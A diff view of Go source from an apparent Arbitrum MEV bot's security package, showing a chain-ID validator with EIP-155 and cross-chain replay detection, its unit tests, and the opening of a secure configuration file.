	if isPlaceholderChainID(tx.ChainId()) {
		result.warnings = append(result.warnings, "Transaction missing chain ID (pre-EIP155)")
		return result
	}
	chainID := normalizedChainID.Uint64()
	result.chainID = chainID
	// Verify the transaction signature includes chain ID protection.
	// EIP-155 requires v = CHAIN_ID * 2 + 35 or v = CHAIN_ID * 2 + 36.
	v, _, _ := tx.RawSignatureValues()
	expectedV1 := chainID*2 + 35
	expectedV2 := chainID*2 + 36
	actualV := v.Uint64()
	switch {
	case actualV == expectedV1 || actualV == expectedV2:
		result.protected = true
	case actualV == 27 || actualV == 28:
		// Pre-EIP-155 signature: valid but replayable across chains.
		result.warnings = append(result.warnings, "Legacy transaction format detected (not EIP-155 protected)")
	default:
		result.warnings = append(result.warnings,
			fmt.Sprintf("Invalid v value for EIP-155: got %d, expected %d or %d",
				actualV, expectedV1, expectedV2))
	}
	return result
}
// ReplayResult contains replay attack detection results
type ReplayResult struct {
	riskLevel string   // NONE, MEDIUM, or CRITICAL (see detectReplayAttack)
	warnings  []string // human-readable findings accompanying the risk level
}
// detectReplayAttack detects potential cross-chain replay attacks
//
// It keys transactions by a canonical identifier (sender, nonce, recipient,
// value, calldata prefix). Seeing the same identifier on a different chain
// is rated CRITICAL; more than three repeats on the same chain is rated
// MEDIUM; a first sighting is recorded and rated NONE. Stale entries are
// purged before the lookup. The detector's own mutex guards the map; the
// caller already holds cv.mu.
func (cv *ChainIDValidator) detectReplayAttack(tx *types.Transaction, signerAddr common.Address, normalizedChainID uint64) ReplayResult {
	result := ReplayResult{
		riskLevel: "NONE",
		warnings:  make([]string, 0),
	}
	// Clean old tracking data (takes and releases detector.mu internally,
	// so it must run before the Lock below).
	cv.cleanOldTrackingData()
	// Create a canonical transaction representation for tracking
	// Use a combination of nonce, to, value, and data to identify potential replays
	txIdentifier := cv.createTransactionIdentifier(tx, signerAddr)
	detector := cv.replayAttackDetector
	detector.mu.Lock()
	defer detector.mu.Unlock()
	if record, exists := detector.seenTransactions[txIdentifier]; exists {
		// This transaction pattern has been seen before
		currentChainID := normalizedChainID
		if record.ChainID != currentChainID {
			// Same transaction on different chain - CRITICAL replay risk
			result.riskLevel = "CRITICAL"
			result.warnings = append(result.warnings,
				fmt.Sprintf("Identical transaction detected on chain %d and %d - possible replay attack",
					record.ChainID, currentChainID))
			// Re-record under the new chain ID so repeat offenses keep counting.
			cv.replayAttackDetector.seenTransactions[txIdentifier] = ChainIDRecord{
				ChainID:        currentChainID,
				FirstSeen:      record.FirstSeen,
				Count:          record.Count + 1,
				From:           signerAddr,
				AlertTriggered: true,
			}
			cv.replayAttemptCount++
			cv.logger.Error(fmt.Sprintf("CRITICAL SECURITY ALERT: Potential replay attack detected! "+
				"Transaction %s from %s seen on chains %d and %d",
				txIdentifier, signerAddr.Hex(), record.ChainID, currentChainID))
		} else {
			// Same transaction on same chain - possible retry or duplicate
			record.Count++
			if record.Count > 3 {
				result.riskLevel = "MEDIUM"
				result.warnings = append(result.warnings, "Multiple identical transactions detected")
			}
			detector.seenTransactions[txIdentifier] = record
		}
	} else {
		// First time seeing this transaction
		detector.seenTransactions[txIdentifier] = ChainIDRecord{
			ChainID:        normalizedChainID,
			FirstSeen:      time.Now(),
			Count:          1,
			From:           signerAddr,
			AlertTriggered: false,
		}
	}
	return result
}
// ChainSpecificResult contains chain-specific validation results
type ChainSpecificResult struct {
	valid    bool     // false when any chain rule was violated
	warnings []string // non-fatal rule findings
	errors   []string // fatal rule violations; non-empty implies valid == false
}
// validateChainSpecificRules applies per-chain sanity rules: gas-price and
// gas-limit checks on Arbitrum One, a large-transfer warning on Arbitrum
// Sepolia, and a hard rejection of any other chain ID.
func (cv *ChainIDValidator) validateChainSpecificRules(tx *types.Transaction, chainID uint64) ChainSpecificResult {
	out := ChainSpecificResult{
		valid:    true,
		warnings: make([]string, 0),
		errors:   make([]string, 0),
	}

	switch chainID {
	case 42161: // Arbitrum One
		// Warn on gas prices above 1000 Gwei — unusual for Arbitrum.
		highGasPrice := big.NewInt(1000000000000)
		if gp := tx.GasPrice(); gp != nil && gp.Cmp(highGasPrice) > 0 {
			out.warnings = append(out.warnings, "Unusually high gas price for Arbitrum")
		}
		// Reject gas limits beyond the Arbitrum block gas limit.
		if tx.Gas() > 32000000 {
			out.valid = false
			out.errors = append(out.errors, "Gas limit exceeds Arbitrum maximum")
		}
	case 421614: // Arbitrum Sepolia testnet
		// Warn on transfers above 100 ETH — suspicious on a testnet.
		hundredETH := new(big.Int).Mul(big.NewInt(100), big.NewInt(1e18))
		if v := tx.Value(); v != nil && v.Cmp(hundredETH) > 0 {
			out.warnings = append(out.warnings, "Large value transfer on testnet")
		}
	default:
		// Any other chain is unsupported outright.
		out.valid = false
		out.errors = append(out.errors, fmt.Sprintf("Unsupported chain ID: %d", chainID))
	}
	return out
}
// createTransactionIdentifier builds a canonical replay-tracking key from
// the fields that would be identical in a replayed transaction: sender,
// nonce, recipient, value, and the first 32 bytes of calldata.
func (cv *ChainIDValidator) createTransactionIdentifier(tx *types.Transaction, signerAddr common.Address) string {
	// Contract creations have no destination; use a sentinel.
	toAddr := "0x0"
	if to := tx.To(); to != nil {
		toAddr = to.Hex()
	}

	// Only the leading 32 bytes of calldata participate in the key.
	dataPrefix := ""
	if data := tx.Data(); len(data) > 0 {
		if len(data) > 32 {
			data = data[:32]
		}
		dataPrefix = common.Bytes2Hex(data)
	}

	return fmt.Sprintf("%s:%d:%s:%s:%s",
		signerAddr.Hex(),
		tx.Nonce(),
		toAddr,
		tx.Value().String(),
		dataPrefix)
}
// cleanOldTrackingData purges replay-tracking records older than the
// detector's tracking window. It takes the detector's mutex itself, so the
// caller must not already hold it.
func (cv *ChainIDValidator) cleanOldTrackingData() {
	d := cv.replayAttackDetector
	d.mu.Lock()
	defer d.mu.Unlock()

	expiry := time.Now().Add(-d.maxTrackingTime)
	for id, rec := range d.seenTransactions {
		if rec.FirstSeen.Before(expiry) {
			delete(d.seenTransactions, id)
		}
	}
}
// GetValidationStats returns a snapshot of validation statistics for
// monitoring and audit.
//
// The allowed-chain-ID list is built inline rather than via
// getAllowedChainIDs: that helper acquires cv.mu.RLock itself, and calling
// it while this method already holds the read lock is a recursive RLock —
// which sync.RWMutex forbids and which deadlocks whenever a writer (e.g.
// AddAllowedChainID) queues between the two acquisitions.
func (cv *ChainIDValidator) GetValidationStats() map[string]interface{} {
	cv.mu.RLock()
	allowed := make([]uint64, 0, len(cv.allowedChainIDs))
	for chainID := range cv.allowedChainIDs {
		allowed = append(allowed, chainID)
	}
	stats := map[string]interface{}{
		"total_validations":   cv.validationCount,
		"chain_id_mismatches": cv.mismatchCount,
		"replay_attempts":     cv.replayAttemptCount,
		"last_mismatch_time":  cv.lastMismatchTime.Unix(),
		"expected_chain_id":   cv.expectedChainID.Uint64(),
		"allowed_chain_ids":   allowed,
	}
	cv.mu.RUnlock()

	// The detector has its own lock; take it after releasing cv.mu to keep
	// the cv.mu -> detector.mu ordering used elsewhere short-lived.
	detector := cv.replayAttackDetector
	detector.mu.Lock()
	stats["tracking_entries"] = len(detector.seenTransactions)
	detector.mu.Unlock()

	return stats
}
// getAllowedChainIDs returns a snapshot of the allowlist as a slice.
// Callers must not already hold cv.mu (it read-locks internally).
func (cv *ChainIDValidator) getAllowedChainIDs() []uint64 {
	cv.mu.RLock()
	defer cv.mu.RUnlock()

	ids := make([]uint64, 0, len(cv.allowedChainIDs))
	for id := range cv.allowedChainIDs {
		ids = append(ids, id)
	}
	return ids
}
// AddAllowedChainID adds a chain ID to the allowed list and logs the change.
func (cv *ChainIDValidator) AddAllowedChainID(chainID uint64) {
	cv.mu.Lock()
	cv.allowedChainIDs[chainID] = true
	cv.mu.Unlock()

	cv.logger.Info(fmt.Sprintf("Added chain ID %d to allowed list", chainID))
}
// RemoveAllowedChainID removes a chain ID from the allowed list and logs
// the change. Removing an absent ID is a no-op.
func (cv *ChainIDValidator) RemoveAllowedChainID(chainID uint64) {
	cv.mu.Lock()
	delete(cv.allowedChainIDs, chainID)
	cv.mu.Unlock()

	cv.logger.Info(fmt.Sprintf("Removed chain ID %d from allowed list", chainID))
}
// ValidateSignerMatchesChain verifies that the transaction's recovered
// signer equals expectedSigner and that its signature is valid for the
// transaction's chain ID.
//
// Supports legacy (EIP-155), access-list (EIP-2930), and dynamic-fee
// (EIP-1559) transactions; the original version rejected EIP-2930
// transactions as "unsupported" even though they are standard on these
// chains.
func (cv *ChainIDValidator) ValidateSignerMatchesChain(tx *types.Transaction, expectedSigner common.Address) error {
	// Create appropriate signer based on transaction type.
	var signer types.Signer
	switch tx.Type() {
	case types.LegacyTxType:
		signer = types.NewEIP155Signer(tx.ChainId())
	case types.AccessListTxType:
		signer = types.NewEIP2930Signer(tx.ChainId())
	case types.DynamicFeeTxType:
		signer = types.NewLondonSigner(tx.ChainId())
	default:
		return fmt.Errorf("unsupported transaction type: %d", tx.Type())
	}
	// Recover the signer from the transaction signature.
	recoveredSigner, err := types.Sender(signer, tx)
	if err != nil {
		return fmt.Errorf("failed to recover signer: %w", err)
	}
	// Verify the recovered signer matches the expected one.
	if recoveredSigner != expectedSigner {
		return fmt.Errorf("signer mismatch: expected %s, got %s",
			expectedSigner.Hex(), recoveredSigner.Hex())
	}
	// Additional validation: ensure the signature is valid for this chain.
	if !cv.verifySignatureForChain(tx, recoveredSigner) {
		return fmt.Errorf("signature invalid for chain ID %d", tx.ChainId().Uint64())
	}
	return nil
}
// verifySignatureForChain reports whether the transaction's signature is
// valid for its chain ID by re-recovering the sender with a chain-bound
// signer and comparing it against the given address.
//
// Supports legacy (EIP-155), access-list (EIP-2930), and dynamic-fee
// (EIP-1559) transactions; the original version returned false for all
// EIP-2930 transactions.
func (cv *ChainIDValidator) verifySignatureForChain(tx *types.Transaction, signer common.Address) bool {
	// Create appropriate signer based on transaction type.
	var chainSigner types.Signer
	switch tx.Type() {
	case types.LegacyTxType:
		chainSigner = types.NewEIP155Signer(tx.ChainId())
	case types.AccessListTxType:
		chainSigner = types.NewEIP2930Signer(tx.ChainId())
	case types.DynamicFeeTxType:
		chainSigner = types.NewLondonSigner(tx.ChainId())
	default:
		return false // Unsupported transaction type
	}
	// If recovery succeeds and yields the same address, the signature is
	// valid for this chain.
	recoveredSigner, err := types.Sender(chainSigner, tx)
	if err != nil {
		return false
	}
	return recoveredSigner == signer
}

View File

@@ -0,0 +1,459 @@
package security
import (
"math/big"
"strings"
"testing"
"time"
"github.com/ethereum/go-ethereum/common"
"github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/crypto"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"github.com/fraktal/mev-beta/internal/logger"
)
// TestNewChainIDValidator verifies constructor defaults: the expected chain
// ID is recorded, both Arbitrum networks are pre-allowed, and the replay
// attack detector is initialized.
func TestNewChainIDValidator(t *testing.T) {
	log := logger.New("info", "text", "")
	wantChainID := big.NewInt(42161) // Arbitrum mainnet

	v := NewChainIDValidator(log, wantChainID)

	assert.NotNil(t, v)
	assert.Equal(t, wantChainID.Uint64(), v.expectedChainID.Uint64())
	assert.True(t, v.allowedChainIDs[42161])  // Arbitrum mainnet
	assert.True(t, v.allowedChainIDs[421614]) // Arbitrum testnet
	assert.NotNil(t, v.replayAttackDetector)
}
// TestValidateChainID_ValidTransaction covers the happy path: an EIP-155
// transaction signed for the expected chain (Arbitrum One, 42161) must
// validate cleanly — no errors, no replay risk, EIP-155 protection detected.
func TestValidateChainID_ValidTransaction(t *testing.T) {
	logger := logger.New("info", "text", "")
	expectedChainID := big.NewInt(42161)
	validator := NewChainIDValidator(logger, expectedChainID)
	// Create a valid EIP-155 transaction for Arbitrum
	tx := types.NewTransaction(
		0, // nonce
		common.HexToAddress("0x1234567890123456789012345678901234567890"), // to
		big.NewInt(1000000000000000000), // value (1 ETH)
		21000,                           // gas limit
		big.NewInt(20000000000),         // gas price (20 Gwei)
		nil,                             // data
	)
	// Create a properly signed transaction for testing
	privateKey, err := crypto.GenerateKey()
	require.NoError(t, err)
	signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
	signer := types.NewEIP155Signer(expectedChainID)
	signedTx, err := types.SignTx(tx, signer, privateKey)
	require.NoError(t, err)
	result := validator.ValidateChainID(signedTx, signerAddr, nil)
	// A matching chain ID must yield a fully clean validation result.
	assert.True(t, result.Valid)
	assert.Equal(t, expectedChainID.Uint64(), result.ExpectedChainID)
	assert.Equal(t, expectedChainID.Uint64(), result.ActualChainID)
	assert.True(t, result.IsEIP155Protected)
	assert.Equal(t, "NONE", result.ReplayRisk)
	assert.Empty(t, result.Errors)
}
// TestValidateChainID_InvalidChainID verifies that a transaction signed for
// a different chain (Ethereum mainnet, 1) is rejected with a "Chain ID
// mismatch" error when the validator expects Arbitrum One (42161), and that
// both the expected and actual chain IDs are reported.
func TestValidateChainID_InvalidChainID(t *testing.T) {
	logger := logger.New("info", "text", "")
	expectedChainID := big.NewInt(42161) // Arbitrum
	validator := NewChainIDValidator(logger, expectedChainID)
	// Create transaction with wrong chain ID (Ethereum mainnet)
	wrongChainID := big.NewInt(1)
	tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
	privateKey, err := crypto.GenerateKey()
	require.NoError(t, err)
	signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
	signer := types.NewEIP155Signer(wrongChainID)
	signedTx, err := types.SignTx(tx, signer, privateKey)
	require.NoError(t, err)
	result := validator.ValidateChainID(signedTx, signerAddr, nil)
	assert.False(t, result.Valid)
	assert.Equal(t, expectedChainID.Uint64(), result.ExpectedChainID)
	assert.Equal(t, wrongChainID.Uint64(), result.ActualChainID)
	assert.NotEmpty(t, result.Errors)
	assert.Contains(t, result.Errors[0], "Chain ID mismatch")
}
// TestValidateChainID_ReplayAttackDetection checks that the validator flags
// a CRITICAL replay risk when the same transaction payload (same nonce, to,
// value, gas) from the same signer is seen on two different allowed chains.
// The validator is stateful: the first validation primes the replay
// detector, and the order of the two validations matters.
func TestValidateChainID_ReplayAttackDetection(t *testing.T) {
	logger := logger.New("info", "text", "")
	expectedChainID := big.NewInt(42161)
	validator := NewChainIDValidator(logger, expectedChainID)
	privateKey, err := crypto.GenerateKey()
	require.NoError(t, err)
	signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
	// Create identical transactions on different chains
	tx1 := types.NewTransaction(1, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
	tx2 := types.NewTransaction(1, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
	// Sign first transaction with Arbitrum chain ID
	signer1 := types.NewEIP155Signer(big.NewInt(42161))
	signedTx1, err := types.SignTx(tx1, signer1, privateKey)
	require.NoError(t, err)
	// Sign second identical transaction with different chain ID
	signer2 := types.NewEIP155Signer(big.NewInt(421614)) // Arbitrum testnet
	signedTx2, err := types.SignTx(tx2, signer2, privateKey)
	require.NoError(t, err)
	// First validation should pass
	result1 := validator.ValidateChainID(signedTx1, signerAddr, nil)
	assert.True(t, result1.Valid)
	assert.Equal(t, "NONE", result1.ReplayRisk)
	// Create a new validator and add testnet to allowed chains
	validator.AddAllowedChainID(421614)
	// Second validation should detect replay risk
	result2 := validator.ValidateChainID(signedTx2, signerAddr, nil)
	assert.Equal(t, "CRITICAL", result2.ReplayRisk)
	assert.NotEmpty(t, result2.Warnings)
	assert.Contains(t, result2.Warnings[0], "replay attack")
}
// TestValidateEIP155Protection confirms that a transaction signed with an
// EIP-155 signer is reported as replay-protected, carries the correct chain
// ID, and produces no warnings.
func TestValidateEIP155Protection(t *testing.T) {
	log := logger.New("info", "text", "")
	chainID := big.NewInt(42161)
	v := NewChainIDValidator(log, chainID)

	key, err := crypto.GenerateKey()
	require.NoError(t, err)

	// Sign a minimal transfer with the EIP-155 signer for the expected chain.
	unsigned := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
	signedTx, err := types.SignTx(unsigned, types.NewEIP155Signer(chainID), key)
	require.NoError(t, err)

	res := v.validateEIP155Protection(signedTx, chainID)
	assert.True(t, res.protected)
	assert.Equal(t, chainID.Uint64(), res.chainID)
	assert.Empty(t, res.warnings)
}
// TestValidateEIP155Protection_LegacyTransaction verifies that a pre-EIP-155
// (Homestead-signed) transaction is reported as unprotected and produces a
// warning about the legacy format or missing chain ID.
func TestValidateEIP155Protection_LegacyTransaction(t *testing.T) {
	logger := logger.New("info", "text", "")
	expectedChainID := big.NewInt(42161)
	validator := NewChainIDValidator(logger, expectedChainID)
	// Create a legacy transaction (pre-EIP155) by manually setting v to 27
	tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
	// For testing purposes, we'll create a transaction that mimics legacy format
	// In practice, this would be a transaction created before EIP-155
	signer := types.HomesteadSigner{} // Pre-EIP155 signer
	privateKey, err := crypto.GenerateKey()
	require.NoError(t, err)
	signedTx, err := types.SignTx(tx, signer, privateKey)
	require.NoError(t, err)
	result := validator.validateEIP155Protection(signedTx, expectedChainID)
	assert.False(t, result.protected)
	assert.NotEmpty(t, result.warnings)
	// Legacy transactions may not have chain ID, so check for either warning
	hasExpectedWarning := false
	for _, warning := range result.warnings {
		if strings.Contains(warning, "Legacy transaction format") || strings.Contains(warning, "Transaction missing chain ID") {
			hasExpectedWarning = true
			break
		}
	}
	assert.True(t, hasExpectedWarning, "Should contain legacy transaction warning")
}
// TestChainSpecificValidation_Arbitrum exercises the Arbitrum rule set in
// three steps: a normal transaction passes cleanly, an extreme gas price
// (2000 Gwei) only produces a warning, and a gas limit above the Arbitrum
// maximum (50M) is a hard validation error.
func TestChainSpecificValidation_Arbitrum(t *testing.T) {
	logger := logger.New("info", "text", "")
	expectedChainID := big.NewInt(42161)
	validator := NewChainIDValidator(logger, expectedChainID)
	// Create a properly signed transaction for Arbitrum to test chain-specific rules
	privateKey, err := crypto.GenerateKey()
	require.NoError(t, err)
	// Test normal Arbitrum transaction
	tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(1000000000), nil) // 1 Gwei
	signer := types.NewEIP155Signer(expectedChainID)
	signedTx, err := types.SignTx(tx, signer, privateKey)
	require.NoError(t, err)
	result := validator.validateChainSpecificRules(signedTx, expectedChainID.Uint64())
	assert.True(t, result.valid)
	assert.Empty(t, result.errors)
	// Test high gas price warning
	txHighGas := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(2000000000000), nil) // 2000 Gwei
	signedTxHighGas, err := types.SignTx(txHighGas, signer, privateKey)
	require.NoError(t, err)
	resultHighGas := validator.validateChainSpecificRules(signedTxHighGas, expectedChainID.Uint64())
	// High gas price is suspicious but not fatal: still valid, with a warning.
	assert.True(t, resultHighGas.valid)
	assert.NotEmpty(t, resultHighGas.warnings)
	assert.Contains(t, resultHighGas.warnings[0], "high gas price")
	// Test gas limit too high
	txHighGasLimit := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 50000000, big.NewInt(1000000000), nil) // 50M gas
	signedTxHighGasLimit, err := types.SignTx(txHighGasLimit, signer, privateKey)
	require.NoError(t, err)
	resultHighGasLimit := validator.validateChainSpecificRules(signedTxHighGasLimit, expectedChainID.Uint64())
	assert.False(t, resultHighGasLimit.valid)
	assert.NotEmpty(t, resultHighGasLimit.errors)
	assert.Contains(t, resultHighGasLimit.errors[0], "exceeds Arbitrum maximum")
}
// TestChainSpecificValidation_UnsupportedChain ensures the chain-specific
// rule check rejects a chain ID with no configured rule set.
func TestChainSpecificValidation_UnsupportedChain(t *testing.T) {
	log := logger.New("info", "text", "")
	unknownChain := big.NewInt(999999) // no rules exist for this chain
	v := NewChainIDValidator(log, unknownChain)

	key, err := crypto.GenerateKey()
	require.NoError(t, err)

	unsigned := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(1000000000), nil)
	signedTx, err := types.SignTx(unsigned, types.NewEIP155Signer(unknownChain), key)
	require.NoError(t, err)

	res := v.validateChainSpecificRules(signedTx, unknownChain.Uint64())
	assert.False(t, res.valid)
	assert.NotEmpty(t, res.errors)
	assert.Contains(t, res.errors[0], "Unsupported chain ID")
}
// TestValidateSignerMatchesChain verifies signer recovery: the key that
// actually signed the transaction passes, while an unrelated expected
// address fails with a "signer mismatch" error.
func TestValidateSignerMatchesChain(t *testing.T) {
	logger := logger.New("info", "text", "")
	expectedChainID := big.NewInt(42161)
	validator := NewChainIDValidator(logger, expectedChainID)
	privateKey, err := crypto.GenerateKey()
	require.NoError(t, err)
	expectedSigner := crypto.PubkeyToAddress(privateKey.PublicKey)
	tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
	signer := types.NewEIP155Signer(expectedChainID)
	signedTx, err := types.SignTx(tx, signer, privateKey)
	require.NoError(t, err)
	// Valid signature should pass
	err = validator.ValidateSignerMatchesChain(signedTx, expectedSigner)
	assert.NoError(t, err)
	// Wrong expected signer should fail
	wrongSigner := common.HexToAddress("0x1234567890123456789012345678901234567890")
	err = validator.ValidateSignerMatchesChain(signedTx, wrongSigner)
	assert.Error(t, err)
	assert.Contains(t, err.Error(), "signer mismatch")
}
// TestGetValidationStats checks that validation statistics accumulate: after
// a single ValidateChainID call, the stats map reports one validation, the
// configured expected chain ID, and a non-nil allowed-chain list.
func TestGetValidationStats(t *testing.T) {
	logger := logger.New("info", "text", "")
	expectedChainID := big.NewInt(42161)
	validator := NewChainIDValidator(logger, expectedChainID)
	privateKey, err := crypto.GenerateKey()
	require.NoError(t, err)
	signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
	// Perform some validations to generate stats
	tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
	signer := types.NewEIP155Signer(expectedChainID)
	signedTx, err := types.SignTx(tx, signer, privateKey)
	require.NoError(t, err)
	validator.ValidateChainID(signedTx, signerAddr, nil)
	stats := validator.GetValidationStats()
	assert.NotNil(t, stats)
	assert.Equal(t, uint64(1), stats["total_validations"])
	assert.Equal(t, expectedChainID.Uint64(), stats["expected_chain_id"])
	assert.NotNil(t, stats["allowed_chain_ids"])
}
// TestAddRemoveAllowedChainID exercises the allow-list mutators: adding a
// chain ID makes it visible in the map, removing it takes it back out.
func TestAddRemoveAllowedChainID(t *testing.T) {
	log := logger.New("info", "text", "")
	v := NewChainIDValidator(log, big.NewInt(42161))

	const extraChain = uint64(999)

	// Add new chain ID and confirm it is allowed.
	v.AddAllowedChainID(extraChain)
	assert.True(t, v.allowedChainIDs[extraChain])

	// Remove it again and confirm it is gone.
	v.RemoveAllowedChainID(extraChain)
	assert.False(t, v.allowedChainIDs[extraChain])
}
// TestReplayAttackDetection_CleanOldData is a white-box test of detector
// housekeeping: it validates once to create a tracking record, rewinds that
// record's FirstSeen past the retention window (25h), and asserts that
// cleanOldTrackingData drops it. It reaches directly into
// replayAttackDetector.seenTransactions, so it is tightly coupled to the
// detector's internal representation.
func TestReplayAttackDetection_CleanOldData(t *testing.T) {
	logger := logger.New("info", "text", "")
	expectedChainID := big.NewInt(42161)
	validator := NewChainIDValidator(logger, expectedChainID)
	privateKey, err := crypto.GenerateKey()
	require.NoError(t, err)
	signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
	// Create transaction
	tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
	signer := types.NewEIP155Signer(expectedChainID)
	signedTx, err := types.SignTx(tx, signer, privateKey)
	require.NoError(t, err)
	// First validation
	validator.ValidateChainID(signedTx, signerAddr, nil)
	assert.Equal(t, 1, len(validator.replayAttackDetector.seenTransactions))
	// Manually set old timestamp to test cleanup
	txIdentifier := validator.createTransactionIdentifier(signedTx, signerAddr)
	record := validator.replayAttackDetector.seenTransactions[txIdentifier]
	record.FirstSeen = time.Now().Add(-25 * time.Hour) // Older than maxTrackingTime
	validator.replayAttackDetector.seenTransactions[txIdentifier] = record
	// Trigger cleanup
	validator.cleanOldTrackingData()
	assert.Equal(t, 0, len(validator.replayAttackDetector.seenTransactions))
}
// Integration test with KeyManager: signs through the full KeyManager path
// and checks that a transaction for the expected chain succeeds, a wrong
// chain ID is rejected, and validation stats/expected chain are exposed.
//
// NOTE(review): the "Skip" name prefix makes `go test` ignore this function
// entirely and hides it from tooling; the idiomatic way to disable it while
// keeping it visible is to rename it TestKeyManagerChainValidationIntegration
// and call t.Skip("reason") at the top — TODO confirm why it was disabled.
func SkipTestKeyManagerChainValidationIntegration(t *testing.T) {
	config := &KeyManagerConfig{
		KeystorePath:          t.TempDir(),
		EncryptionKey:         "test_key_32_chars_minimum_length_required",
		MaxFailedAttempts:     3,
		LockoutDuration:       5 * time.Minute,
		MaxSigningRate:        10,
		EnableAuditLogging:    true,
		RequireAuthentication: false,
	}
	logger := logger.New("info", "text", "")
	expectedChainID := big.NewInt(42161)
	km, err := newKeyManagerInternal(config, logger, expectedChainID, false) // Use testing version
	require.NoError(t, err)
	// Generate a key
	permissions := KeyPermissions{
		CanSign:        true,
		CanTransfer:    true,
		MaxTransferWei: big.NewInt(1000000000000000000), // 1 ETH
	}
	keyAddr, err := km.GenerateKey("test", permissions)
	require.NoError(t, err)
	// Test valid chain ID transaction
	// Create a transaction that will be properly handled by EIP155 signer
	tx := types.NewTx(&types.LegacyTx{
		Nonce:    0,
		To:       &common.Address{},
		Value:    big.NewInt(1000),
		Gas:      21000,
		GasPrice: big.NewInt(20000000000),
		Data:     nil,
	})
	request := &SigningRequest{
		Transaction:  tx,
		ChainID:      expectedChainID,
		From:         keyAddr,
		Purpose:      "Test transaction",
		UrgencyLevel: 1,
	}
	result, err := km.SignTransaction(request)
	assert.NoError(t, err)
	assert.NotNil(t, result)
	assert.NotNil(t, result.SignedTx)
	// Test invalid chain ID transaction
	wrongChainID := big.NewInt(1) // Ethereum mainnet
	txWrong := types.NewTx(&types.LegacyTx{
		Nonce:    1,
		To:       &common.Address{},
		Value:    big.NewInt(1000),
		Gas:      21000,
		GasPrice: big.NewInt(20000000000),
		Data:     nil,
	})
	requestWrong := &SigningRequest{
		Transaction:  txWrong,
		ChainID:      wrongChainID,
		From:         keyAddr,
		Purpose:      "Invalid chain test",
		UrgencyLevel: 1,
	}
	_, err = km.SignTransaction(requestWrong)
	assert.Error(t, err)
	assert.Contains(t, err.Error(), "doesn't match expected")
	// Test chain validation stats
	stats := km.GetChainValidationStats()
	assert.NotNil(t, stats)
	assert.True(t, stats["total_validations"].(uint64) > 0)
	// Test expected chain ID
	chainID := km.GetExpectedChainID()
	assert.Equal(t, expectedChainID.Uint64(), chainID.Uint64())
}
// TestCrossChainReplayPrevention builds byte-identical transaction payloads
// signed for mainnet (42161) and testnet (421614) and asserts that the
// second validation is flagged as a CRITICAL replay risk and counted in the
// replay_attempts statistic. Validation order matters: the mainnet
// transaction must be seen first to prime the detector.
func TestCrossChainReplayPrevention(t *testing.T) {
	logger := logger.New("info", "text", "")
	validator := NewChainIDValidator(logger, big.NewInt(42161))
	// Add testnet to allowed chains for testing
	validator.AddAllowedChainID(421614)
	privateKey, err := crypto.GenerateKey()
	require.NoError(t, err)
	signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
	// Create identical transaction data
	nonce := uint64(42)
	to := common.HexToAddress("0x1234567890123456789012345678901234567890")
	value := big.NewInt(1000000000000000000) // 1 ETH
	gasLimit := uint64(21000)
	gasPrice := big.NewInt(20000000000) // 20 Gwei
	// Sign for mainnet
	tx1 := types.NewTransaction(nonce, to, value, gasLimit, gasPrice, nil)
	signer1 := types.NewEIP155Signer(big.NewInt(42161))
	signedTx1, err := types.SignTx(tx1, signer1, privateKey)
	require.NoError(t, err)
	// Sign identical transaction for testnet
	tx2 := types.NewTransaction(nonce, to, value, gasLimit, gasPrice, nil)
	signer2 := types.NewEIP155Signer(big.NewInt(421614))
	signedTx2, err := types.SignTx(tx2, signer2, privateKey)
	require.NoError(t, err)
	// First validation (mainnet) should pass
	result1 := validator.ValidateChainID(signedTx1, signerAddr, nil)
	assert.True(t, result1.Valid)
	assert.Equal(t, "NONE", result1.ReplayRisk)
	// Second validation (testnet with same tx data) should detect replay risk
	result2 := validator.ValidateChainID(signedTx2, signerAddr, nil)
	assert.Equal(t, "CRITICAL", result2.ReplayRisk)
	assert.Contains(t, result2.Warnings[0], "replay attack")
	// Verify the detector tracked both chain IDs
	stats := validator.GetValidationStats()
	assert.Equal(t, uint64(1), stats["replay_attempts"])
}

403
orig/pkg/security/config.go Normal file
View File

@@ -0,0 +1,403 @@
package security
import (
"crypto/aes"
"crypto/cipher"
"crypto/rand"
"crypto/sha256"
"encoding/base64"
"fmt"
"io"
"os"
"regexp"
"strconv"
"strings"
"time"
)
// SecureConfig manages all security-sensitive configuration.
//
// Every value is sourced from environment variables at construction time
// (see NewSecureConfig); nothing security-sensitive is hardcoded in the
// binary. The unexported encryption key backs Encrypt/Decrypt.
type SecureConfig struct {
	// Network endpoints - never hardcoded
	RPCEndpoints []string // primary Arbitrum RPC endpoints (HTTPS)
	WSEndpoints  []string // optional WebSocket endpoints (WSS)
	BackupRPCs   []string // optional fallback RPC endpoints
	// Security settings
	MaxGasPriceGwei     int64
	MaxTransactionValue string // In ETH
	MaxSlippageBps      uint64 // basis points (10000 = 100%)
	MinProfitThreshold  string // In ETH
	// Rate limiting
	MaxRequestsPerSecond int
	BurstSize            int
	// Timeouts
	RPCTimeout         time.Duration
	WebSocketTimeout   time.Duration
	TransactionTimeout time.Duration
	// Encryption
	encryptionKey []byte // 32-byte AES-256 key decoded from MEV_BOT_ENCRYPTION_KEY
}
// SecurityLimits defines operational security limits.
// All ETH-denominated values are decimal strings; validate with
// validateETHAmount before use.
